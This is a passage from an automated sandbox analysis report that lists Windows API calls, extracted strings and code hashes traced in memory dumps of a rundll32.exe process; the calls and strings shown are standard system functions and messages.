                                  • Part of subcall function 00A03A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00A03AA6
                                  • Part of subcall function 00A03A51: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00A03AC1
                                  • Part of subcall function 00A03A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00A03AE1
                                  • Part of subcall function 00A03A51: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00A03AF3
                                • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00A03B39
                                • IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00A03B40
                                • GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00A03B6C
                                • PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00A03B87
                                • RtlWow64IsWowGuestMachineSupported.NTDLL ref: 00A03BA9
                                • GetSystemWow64Directory2W.API-MS-WIN-CORE-WOW64-L1-1-1(?,000000F6,?), ref: 00A03BC9
                                • Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000000), ref: 00A03BD4
                                • memset.MSVCRT ref: 00A03BE6
                                • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A03C08
                                • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000), ref: 00A03C16
                                • Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000001), ref: 00A03C20
                                • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF), ref: 00A03C36
                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00A03C44
                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00A03C50
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: Wow64$File$CloseHandle$CreateEnableProcessReadRedirectionSystemmemset$AppendCommandCurrentDirectoryDirectory2GuestLineMachineObjectPathPointerProcess2SingleSupportedWait
                                • String ID: P&u$rundll32.exe
                                • API String ID: 1294557600-1468930581
                                • Opcode ID: 66960c526f0c35c9e9ecbed86740e82d58a9293cf88c66136bde2ebe2cc9358d
                                • Instruction ID: 428789558a2a58ffa8889212c54ceedf48c9d295c3125d36b9e4a1ae046f4651
                                • Opcode Fuzzy Hash: 66960c526f0c35c9e9ecbed86740e82d58a9293cf88c66136bde2ebe2cc9358d
                                • Instruction Fuzzy Hash: 45317072A0112DABDF61DBA4AC8DFEB7B7CAB05704F0001A5E50AD2091DB349B86DB90
                                APIs
                                • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000), ref: 00A021D8
                                • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00A0223F
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: CurrentFormatMessageThread
                                • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                • API String ID: 2411632146-3173542853
                                • Opcode ID: b174089d6096a3643285a25e3aa36b628a8f18cc8aff97b7ea0919e6a3d4590e
                                • Instruction ID: 35029db3f6dd7e47372d6efb8c644c2650c18bded9af35f7c8b003cdfbf5e42d
                                • Opcode Fuzzy Hash: b174089d6096a3643285a25e3aa36b628a8f18cc8aff97b7ea0919e6a3d4590e
                                • Instruction Fuzzy Hash: 7151E271A0030CBBDB349FA5AC4DFA7B7B9EB58700F044A5DF146921E2DA729D90CB61
                                APIs
                                • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00A037D4
                                • CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00A019CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00A037F0
                                • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00A038E7
                                  • Part of subcall function 00A0205A: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00A0161C,00000000,00000001,00A01940,?), ref: 00A02072
                                • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00A03808
                                • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00A0381D
                                  • Part of subcall function 00A053AD: InitOnceExecuteOnce.API-MS-WIN-CORE-SYNCH-L1-2-0(00A084A4,00A053D0,00000000,00000000,00A0382A), ref: 00A053BB
                                • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00A03866
                                • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A03873
                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00A0387A
                                • CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00A08420,?), ref: 00A03897
                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00A038D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandleInitializeOnce$CurrentExecuteHandlesInitInstanceMultipleSecurityThreadUninitializeWait
                                • String ID: P&u
                                • API String ID: 2536006573-3268923125
                                • Opcode ID: 3b14f11d70353908c826bc5937037b32f70db91950cf68e1d73c90b80840afc9
                                • Instruction ID: d0c21b0c6662b53bfd51c9b7ea48dd318d91955b843e79fdc6007f18be398ee7
                                • Opcode Fuzzy Hash: 3b14f11d70353908c826bc5937037b32f70db91950cf68e1d73c90b80840afc9
                                • Instruction Fuzzy Hash: 7031437260070DAFEB109FF4AD8CEAB7ABCFB44745B004469F54692191DBB9D90B8724
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 71f360162e71e5149cb3e08507a6e71ac0531e5f8d73b1a3cf38d74d0c2abe86
                                • Instruction ID: 7280fe288aa8cab603d5fb64d8d254b64dd87bcb1f859159bb24a3a6c5fc1f08
                                • Opcode Fuzzy Hash: 71f360162e71e5149cb3e08507a6e71ac0531e5f8d73b1a3cf38d74d0c2abe86
                                • Instruction Fuzzy Hash: AD51C7B6A00116BFDB20DF98899097EF7B8BB88604B14C579E495D7741E234FE60CBE1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 856ec430d95d3206e89cbb454a90ae00287cb13e775937af18983400dce3cefb
                                • Instruction ID: 6d4108a3ae1aa6105cd8b4840eb5788dd650c295aa7e9ffc3e4ccf0cb8d96cca
                                • Opcode Fuzzy Hash: 856ec430d95d3206e89cbb454a90ae00287cb13e775937af18983400dce3cefb
                                • Instruction Fuzzy Hash: C6513C72A006456FDB30DF5CC990A7FB7F8DF88204B1484A9E4D6E7651E6B8FA00C760
                                APIs
                                • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,000000C8), ref: 00A0391E
                                • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000402,?,000000C8,?,000000C8), ref: 00A03963
                                • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(CONOUT$,C0000000,00000003,00000000,00000003,00000000,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00A03992
                                • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00A039D0
                                • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,00A01844,00000002,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00A039E6
                                • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00A03A15
                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000001,?,00000402,?,000000C8,?,000000C8), ref: 00A03A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ConsoleWrite$LoadString$CloseCreateFileHandle
                                • String ID: CONOUT$$P&u
                                • API String ID: 258192622-2938381751
                                • Opcode ID: c3031990447438ec2b63b1483a3727a2457d827b946959ab70824d54cd66d3db
                                • Instruction ID: e393868aefa5e2fdcb27126273387346e53c79ab04d7d11748da294edea2b344
                                • Opcode Fuzzy Hash: c3031990447438ec2b63b1483a3727a2457d827b946959ab70824d54cd66d3db
                                • Instruction Fuzzy Hash: C331A03260011DABEB20DB64DD49FEB777CEB45B40F048095FA4A96181E670AF0ACE60
                                APIs
                                • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?), ref: 00A02B6D
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID: `(u
                                • API String ID: 24740636-2040362809
                                • Opcode ID: 64eeefdb16e9a349e8f768a2de82a7295a5f1d79527a58a0dd025eaafb7b63e4
                                • Instruction ID: ddce458bade9925d9d809ee8398b0c51c72c8bda7203fafb1cb3c4373b6cc68f
                                • Opcode Fuzzy Hash: 64eeefdb16e9a349e8f768a2de82a7295a5f1d79527a58a0dd025eaafb7b63e4
                                • Instruction Fuzzy Hash: 19314930A0031EABFB249BA1AC8CBAF3669EF45355F204126F506D62D1D674CD429792
                                Strings
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049D46FC
                                • ExecuteOptions, xrefs: 049D46A0
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 049D4742
                                • Execute=1, xrefs: 049D4713
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 049D4655
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 049D4725
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 049D4787
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: 18eb361314c168f908eb0f85492fcee61c21f785aeb5329e7d8bff072c60bad5
                                • Instruction ID: b98cdc7d1e035e7d64501880df18c2df36d0418bd7dfb12f4319cbc1deac2070
                                • Opcode Fuzzy Hash: 18eb361314c168f908eb0f85492fcee61c21f785aeb5329e7d8bff072c60bad5
                                • Instruction Fuzzy Hash: E251F431610219BBEF10AEE8DC89FAA77ECABC4304F0404F9E505AB180EB71BE41CE51
                                APIs
                                • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00A03A7B
                                • memset.MSVCRT ref: 00A03A8F
                                • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00A03AA6
                                • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00A03AC1
                                • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00A03AE1
                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00A03AF3
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: File$Read$CloseCreateHandlePointermemset
                                • String ID: P&u
                                • API String ID: 3827546496-3268923125
                                • Opcode ID: 1d9c191384824ea4532b8cfbee2d44181ab2bf81d165b6dc5c4564aeb57dd6d9
                                • Instruction ID: 6e604c8a11359974e2e13bc24e799b21a802d1e456a388a7703c037c0b42cf8e
                                • Opcode Fuzzy Hash: 1d9c191384824ea4532b8cfbee2d44181ab2bf81d165b6dc5c4564aeb57dd6d9
                                • Instruction Fuzzy Hash: 3F118E727011286BDB209BA5AC49FEF7B7CEB46760F400154FA58E20D0EA708A47CAA1
                                APIs
                                • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A03431
                                • DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00A03443
                                • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A0346A
                                • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A0347C
                                • AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A034CF
                                • EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00A034E1
                                • DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(00000000), ref: 00A034EF
                                • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00A0350F
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: Lock$PointerReleaseShared$AcquireDecodeExclusive$Encode
                                • String ID:
                                • API String ID: 3770696666-0
                                • Opcode ID: 1c2dcb87031c59da349d91787da4f641bb350fa7eb3e7189a187104c0146826f
                                • Instruction ID: e1646842f1ee0debad7eeb63949b9a974cb567ab8e63e2f4adc058c12630becd
                                • Opcode Fuzzy Hash: 1c2dcb87031c59da349d91787da4f641bb350fa7eb3e7189a187104c0146826f
                                • Instruction Fuzzy Hash: 1E411C75A0021DEFCB05DFA4DC8896EBBB9FF497117144099E906DB361DB31AE02CB50
                                APIs
                                • _wtoi.MSVCRT(?), ref: 00A03D94
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00A03DA0
                                • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00A03DD3
                                • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,?,00000000,00000000), ref: 00A03DF1
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00A03E13
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00A03E30
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00A03E43
                                • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,00000000,?,00000000,00000000), ref: 00A03E4C
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$Local$AllocByteCharFreeMultiWide_wtoi
                                • String ID:
                                • API String ID: 3528786098-0
                                • Opcode ID: 0884d73f4c17d2fa938c1baddd71044e9087e24ad7f848e210c1b00b464b2461
                                • Instruction ID: 42cda6345dc74175284c4e96ac176981d0cbb9817ddf3a062caa179da17b1308
                                • Opcode Fuzzy Hash: 0884d73f4c17d2fa938c1baddd71044e9087e24ad7f848e210c1b00b464b2461
                                • Instruction Fuzzy Hash: 2431BF7660021AEFDF218FA4EC489ABBBFDEF49710B144569ED45C3291D7708E02C6A0
                                APIs
                                • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00A06C20,00000058), ref: 00A05F3A
                                • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8), ref: 00A05F6F
                                • _amsg_exit.MSVCRT ref: 00A05F84
                                • _initterm.MSVCRT ref: 00A05FD8
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00A06004
                                • exit.MSVCRT ref: 00A06087
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
                                • String ID:
                                • API String ID: 2849151604-0
                                • Opcode ID: 24fe09ee89f8220d19f5cb39ff0e0ae6d0924e51a192c553559876aa9da9511f
                                • Instruction ID: a473e39fd747f9661f292d8e66de564e8447d9ac6df42075211e93b507d3d67f
                                • Opcode Fuzzy Hash: 24fe09ee89f8220d19f5cb39ff0e0ae6d0924e51a192c553559876aa9da9511f
                                • Instruction Fuzzy Hash: FD41FF70A8071F9BEB24DFA4B94476A36B0FB08758F20812DE881972D1DB788C528A58
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                • Instruction ID: dc57461b8510733814d8fc9320b0897b6c90d65de5d694b494a94ba67c4214ab
                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                • Instruction Fuzzy Hash: 420213B1508341AFD315DF18C990A6FBBF5EFC8704F14892DB9998B264EB31E905CB92
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-$0$0
                                • API String ID: 1302938615-699404926
                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction ID: 9153ae1d085a33a5b335aedd362f35783ea0ed15e9ad2e2b5530006d08069c77
                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction Fuzzy Hash: 2A81D230E052499EDF24CE68C8507FEBBB6AF85320F184639DA61A7691C770B860CBD1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$[$]:%u
                                • API String ID: 48624451-2819853543
                                • Opcode ID: 4d35cf06f677b7a9e3e14052d81e031620c804332517fbff63a2c66e3e7e44ef
                                • Instruction ID: 215524a610f99986ea69818dc36d0faf1836727a98805ad28003feb0661c5191
                                • Opcode Fuzzy Hash: 4d35cf06f677b7a9e3e14052d81e031620c804332517fbff63a2c66e3e7e44ef
                                • Instruction Fuzzy Hash: 13213E77E01219ABDB10DFA9D840AEEBBF9EF94654F440166E945E3210E730FA118BA1
                                APIs
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00A04925
                                • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00A04936
                                • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00A0495D
                                • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00A04964
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorHeapLast$FreeProcess
                                • String ID: `(u
                                • API String ID: 1234203156-2040362809
                                • Opcode ID: 0a43ec8721c7bd0e16e71da214930e67b7ecd2a0e90de8e9ff136d9d50e8a52f
                                • Instruction ID: 5ee6298528b298d13458e48c784516f5f6242d19c076c9a920d2c71be63af29a
                                • Opcode Fuzzy Hash: 0a43ec8721c7bd0e16e71da214930e67b7ecd2a0e90de8e9ff136d9d50e8a52f
                                • Instruction Fuzzy Hash: F121F3B150011CDBCB14EFA0FE88A7FB768BF897457044064FA029A0A6DB309D07DBA0
                                Strings
                                • RTL: Re-Waiting, xrefs: 049D031E
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049D02E7
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049D02BD
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
                                • Opcode ID: 4e3e7818b0c4bd040172e3847b02221c7841b078f4374ac3ca146ebb2675f68a
                                • Instruction ID: e98bcb2ac41879a725588637110a11ff6350224d357a0d458b3d191061053a8e
                                • Opcode Fuzzy Hash: 4e3e7818b0c4bd040172e3847b02221c7841b078f4374ac3ca146ebb2675f68a
                                • Instruction Fuzzy Hash: 45E1CD306047419FE725DF28C884B2AB7E5BB88328F144A7DF5A58B2E0E774F845CB52
                                APIs
                                • CharNextW.API-MS-WIN-CORE-STRING-L2-1-0(?,00000000,?,00000000,?), ref: 00A05885
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
